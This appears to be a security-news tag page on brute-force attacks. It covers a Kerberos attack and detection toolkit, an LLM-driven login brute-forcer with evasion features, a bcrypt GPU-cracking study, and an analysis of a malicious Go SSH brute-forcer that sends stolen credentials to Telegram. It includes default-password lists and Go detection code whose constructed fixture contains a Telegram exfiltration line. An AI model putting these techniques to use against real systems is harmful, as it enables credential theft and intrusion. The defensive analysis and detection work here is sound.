Tag: brute-force

  • Inside the Protocol: Master Kerberos Defense and Detection with Kerlab’s Rust Toolkit

    Kerlab

A Rust implementation of Kerberos for Fun and Detection

Kerlab was developed to drill down into the Kerberos protocol and understand it better. Its main purpose is to support writing more targeted detection rules.

    kerasktgt Kerberos Ask Ticket Granting Ticket

Used to ask for the first ticket in the Kerberos protocol. If the username is not set, the TGT request is made without pre-authentication. It writes the ticket in KRB_CRED format, compatible with Rubeus or Mimikatz. Either the cleartext password or the NTLM hash can be used.

kerasktgs Kerberos Ask Ticket Granting Service

Used to ask for a TGS ticket using a saved TGT. kerasktgs supports the S4U protocol extension through the s4u options.

    kerforce Kerberos Brute Force

Used to perform an online brute-force attack. The file attribute is a plain file with one password per line.

    kerspray Kerberos Password Spraying

Used to perform a Kerberos password spraying attack using a list of usernames.

    kerticket Kerberos Ticket Viewer

Prints information about a ticket saved on disk. Used to convert a ticket into a hashcat-compatible format. The EncTicketPartBody can be decrypted using the hash or the password of the service (including krbtgt).
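Since Kerlab's stated purpose is better detection rules, here is an added example (not part of Kerlab or this post) that separates the two failure shapes kerforce and kerspray produce: many pre-authentication failures against one account from one source versus one failure each across many accounts. The log lines are constructed in an assumed "time source user" shape; in practice a defender would map Windows event 4771 (Kerberos pre-authentication failed) records onto it, and the threshold is an assumed tuning value.

```go
package main

import "strings"

// Constructed failure records (time source user); not real telemetry.
const sampleLog = `09:00:01 10.0.0.5 bob
09:00:02 10.0.0.5 bob
09:00:03 10.0.0.5 bob
09:00:04 10.0.0.5 bob
09:00:05 10.0.0.5 bob
09:00:06 10.0.0.9 alice
09:00:07 10.0.0.9 bob
09:00:08 10.0.0.9 carol
09:00:09 10.0.0.9 dave
09:00:10 10.0.0.9 eve
09:00:11 10.0.0.20 alice`

// Classify parses the log and labels each source: many failures against one
// account looks like kerforce, one failure across many accounts like kerspray.
func Classify(log string, threshold int) map[string]string {
	failures := map[string]int{}
	users := map[string]map[string]bool{}
	for _, line := range strings.Split(strings.TrimSpace(log), "\n") {
		f := strings.Fields(line) // assumed shape: time source user
		if len(f) != 3 {
			continue
		}
		src, user := f[1], f[2]
		failures[src]++
		if users[src] == nil {
			users[src] = map[string]bool{}
		}
		users[src][user] = true
	}
	verdict := map[string]string{}
	for src, n := range failures {
		switch distinct := len(users[src]); {
		case distinct >= threshold:
			verdict[src] = "password spray"
		case n >= threshold && distinct == 1:
			verdict[src] = "brute force"
		}
	}
	return verdict
}
```

A single mistyped password (10.0.0.20 above) stays below both thresholds and is not reported.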


  • Brute Force Reimagined: How BruteForceAI Uses LLMs to Crack Complex Login Forms

BruteForceAI is a penetration testing tool that extends traditional brute-force attacks by integrating Large Language Models (LLMs) for form analysis. The tool identifies login form selectors using an LLM, then executes multi-threaded attacks with human-like timing patterns.

    LLM-Powered Form Analysis

    • Stage 1 (AI Analysis): LLM analyzes HTML content to identify login form elements and selectors
    • Stage 2 (Smart Attack): Executes intelligent brute-force attacks using AI-discovered selectors

    Advanced Attack Features

    • Multi-threaded execution with synchronized delays
    • Bruteforce & Password Spray attack modes
    • Human-like timing with jitter and randomization
    • User-Agent rotation for better evasion
    • Webhook notifications (Discord, Slack, Teams, Telegram)
    • Comprehensive logging with SQLite database

    Features

    Intelligent Analysis

    • LLM-powered form selector identification (Ollama/Groq)
    • Automatic retry with feedback learning
    • DOM change detection for success validation
    • Smart HTML content extraction

    Advanced Attacks

    • Bruteforce Mode: Try all username/password combinations
    • Password Spray Mode: Test each password against all usernames
    • Multi-threaded execution (1-100+ threads)
    • Synchronized delays between attempts for same user

    Evasion Techniques

    • Random User-Agent rotation
    • Configurable delays with jitter
    • Human-like timing patterns
    • Proxy support
    • Browser visibility control

    Monitoring & Notifications

    • Real-time webhook notifications on success
    • Comprehensive SQLite logging
    • Verbose timestamped output
    • Success exit after first valid credentials
    • Skip existing attempts (duplicate prevention)

    Operational Features

    • Output capture to files
    • Colorful terminal interface
    • Network error retry mechanism
    • Force retry existing attempts
    • Database management tools
    • Automatic update checking from mordavid.com


  • New GPUs Make Hacking Passwords Easier. Is Yours Still Safe?

    Researchers at Specops have updated their study on cracking passwords hashed with bcrypt. Two years earlier they published similar findings, but the hardware landscape has shifted dramatically since: the AI boom and surging compute demand have made high-end GPUs more affordable and accessible than ever.

    This shift transcends gaming. Modern GPUs are repurposed to train large language models, and idle cycles are routinely rented out on platforms such as vast.ai. The same hardware can be redeployed for other tasks — including attacks against hashed passwords.

    In the new experiment the team used a cluster of eight RTX 5090 cards — a configuration the researchers describe as the “practical minimum” for today’s adversaries. Renting comparable cloud capacity costs on the order of $5 per hour, rendering such attacks attainable even for small groups; larger rigs with 16 GPUs also appear on the market.

    Password cracking

    Unlike earlier measurements that relied on an antiquated bcrypt cost factor of 5, the Specops team tested with more realistic cost parameters of 10 and above. They generated 750,000 hashes derived from the real-world RockYou password corpus. Higher cost factors extend not only the cracking time but also the time required to produce the test corpus: building a dataset at cost 14 required nearly five hours on a powerful workstation.

The results are telling: an RTX 5090 is roughly 65% faster than its predecessor when handling bcrypt, yet higher hashing costs partially offset that advantage. Short, common passwords such as “123456” or “admin” remain trivial to crack, but long, complex passphrases — particularly those exceeding 12 characters — are effectively immune to brute force.

    Timing data show a stark nonlinearity: very short passwords drawn from limited character sets fall almost instantly — four- or five-digit strings succumb immediately; six-character numeric or alphabetic passwords yield within minutes or hours. But an eight-character secret employing mixed case, digits, and symbols can push brute-force timelines to millennia. Once you reach 12 characters with the full complement of character classes, exhaustive search becomes infeasible within any practical horizon.

    It is important to note that real attacks seldom rely on pure brute force. Adversaries more often use dictionaries, mangling rules, or targeted wordlists assembled from corporate footprints. Yet brute force provides a baseline metric of an attacker’s compute capability and underscores the protective value of length and entropy.

    Specops stresses that hashing strength alone is not a panacea: if a password has already been exposed in a leak, bcrypt offers no salvation — the protection is nullified once the secret is compromised.

    Consequently, the researchers recommend holistic password policies: a minimum length of at least 18 characters, mandatory use of multiple character classes, and support for long passphrases. Organizations should also maintain bespoke blocklists that forbid terms tied to the company — product names, brands and other obvious words — which can be generated using tools like CeWL against the organization’s public assets.

    The study’s verdict is simple: cracking has become more attainable as hardware grows more potent, but robust defenses still work — provided users adopt long, unique, high-entropy passwords. In a world where GPUs can be rented for $5 an hour, entropy and length remain the cornerstones of password security.

  • Trust Betrayed: A Malicious Go Package Is a Brute-Force Tool and a Data Thief

    Experts at Socket have uncovered a malicious Go package named golang-random-ip-ssh-bruteforce, which masquerades as a tool for brute-forcing SSH credentials but in reality exfiltrates them to its author via Telegram. The module’s logic is straightforward: upon the first successful login, it immediately transmits the target’s IP address, username, and password to a hardcoded Telegram bot, then terminates execution, leaving the stolen data at the attacker’s disposal.

The package operates in an infinite loop, generating random IPv4 addresses, checking for an open TCP port 22, and, if found, launching parallel authentication attempts from a built-in dictionary of usernames and passwords. Authentication checks are deliberately weakened — the code disables host key verification with ssh.InsecureIgnoreHostKey, so connections proceed without safeguards. On the first successful login, the captured ip:user:pass trio is sent directly to a private Telegram chat via the Telegram Bot API. Tests confirmed that the bot token and chat ID are active, with credentials delivered to an account under the alias @io_ping through the bot @sshZXC_bot.

    The embedded dictionary is limited but targeted — only two accounts, root and admin, paired with common default passwords such as root, toor, raspberry, dietpi, alpine, 123456, alongside variants like webadmin, webmaster, techsupport, and others. This selection is clearly aimed at IoT devices, single-board computers, and poorly secured Linux hosts left with factory defaults. The restricted dataset minimizes noise during brute-forcing and accelerates the discovery of weak targets, aligning with the program’s design to exit after the first successful compromise.

    The module’s author is a Russian developer active in the Go ecosystem and on GitHub under the alias IllDieAnyway. His profile features an arsenal of offensive tools: fast port scanners, a phpMyAdmin brute-forcer that also sends results to Telegram, the Selica-C2 management framework, and utilities for launching DDoS attacks. Many of these projects follow the same template — once a target is compromised, stolen data is exfiltrated via Telegram. His repositories are filled with Russian-language comments and documentation, including utilities linked to the social network VKontakte. Based on this evidence, analysts conclude that the developer operates within the Russian-speaking cybercriminal community.

    The danger of this package is twofold. On the one hand, installing it implicates the user in illegal activity — scanning networks and brute-forcing passwords — which can lead to ISP blocks or even criminal liability. On the other hand, the operator becomes a victim themselves: all “successful” compromises are siphoned off to the author, while their system resources are exploited to fuel someone else’s infrastructure. In effect, anyone running golang-random-ip-ssh-bruteforce is unknowingly working on behalf of a third-party attacker.

    Experts recommend strict software supply chain hygiene: auditing third-party tools before use, blocking network requests to the Telegram API and similar services, and restricting outbound connections from workstations where such utilities should never run. For detection, defenders should watch for red flags such as calls to ssh.InsecureIgnoreHostKey, the presence of a wl.txt default password dictionary, and hardcoded Telegram API requests.
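The three static red flags above can be turned into a simple source audit. The following is an added example (not Socket's detection logic or the package's code) that scans Go source text for them and reports a source as suspicious only when at least two co-occur, since a lone ssh.InsecureIgnoreHostKey is common in lab code; the regexes and the co-occurrence rule are assumptions, and the sample is constructed.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// The three static red flags named in the write-up; the regexes are assumed, not Socket's rules.
var indicators = []struct {
	name string
	re   *regexp.Regexp
}{
	{"host key verification disabled", regexp.MustCompile(`ssh\.InsecureIgnoreHostKey\s*\(`)},
	{"wl.txt default password dictionary", regexp.MustCompile(`\bwl\.txt\b`)},
	{"hardcoded Telegram Bot API request", regexp.MustCompile(`api\.telegram\.org/bot`)},
}

// ScanSource returns each matched indicator with the first line it appears on.
func ScanSource(src string) map[string]int {
	hits := map[string]int{}
	for n, line := range strings.Split(src, "\n") {
		for _, ind := range indicators {
			if _, done := hits[ind.name]; !done && ind.re.MatchString(line) {
				hits[ind.name] = n + 1
			}
		}
	}
	return hits
}

// Suspicious is true when at least two distinct indicators co-occur: a lone
// InsecureIgnoreHostKey is common in lab code, but paired with a default
// password list or a Telegram callback it matches the reported pattern.
func Suspicious(hits map[string]int) bool { return len(hits) >= 2 }

// Constructed sample mimicking the reported pattern; not the real package's code.
const sampleMalicious = `import "golang.org/x/crypto/ssh"
words := readLines("wl.txt")
cfg := &ssh.ClientConfig{HostKeyCallback: ssh.InsecureIgnoreHostKey()}
http.Get("https://api.telegram.org/bot" + tokenPlaceholder + "/sendMessage")`

func main() {
	for name, line := range ScanSource(sampleMalicious) {
		fmt.Printf("line %d: %s\n", line, name)
	}
	fmt.Println("suspicious:", Suspicious(ScanSource(sampleMalicious)))
}
```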